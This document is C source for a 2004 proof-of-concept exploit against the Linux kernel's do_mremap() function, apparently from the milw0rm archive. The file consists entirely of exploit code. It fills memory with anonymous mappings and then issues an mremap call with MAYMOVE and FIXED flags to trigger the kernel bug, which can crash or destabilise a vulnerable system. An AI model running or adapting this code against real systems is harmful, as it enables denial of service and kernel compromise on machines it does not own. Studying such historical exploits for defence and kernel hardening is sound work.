/* * Proof-of-concept exploit code for do_mremap() #2 * * Copyright (C) 2004 Christophe Devine * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include #include #include #include #include #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); #define VMA_SIZE 0x00003000 int main( void ) { int i, ret; void *base0; void *base1; i = 0; while( 1 ) { i++; ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ), VMA_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); if( ret == -1 ) { perror( "mmap" ); break; } base0 = base1; base1 = (void *) ret; } printf( "created ~%d VMAs\n", i ); base0 += 0x1000; base1 += 0x1000; printf( "now mremapping 0x%08X at 0x%08X\n", (int) base1, (int) base0 ); real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 ); printf( "kernel may not be vulnerable\n" ); return( 0 ); } // milw0rm.com [2004-02-18]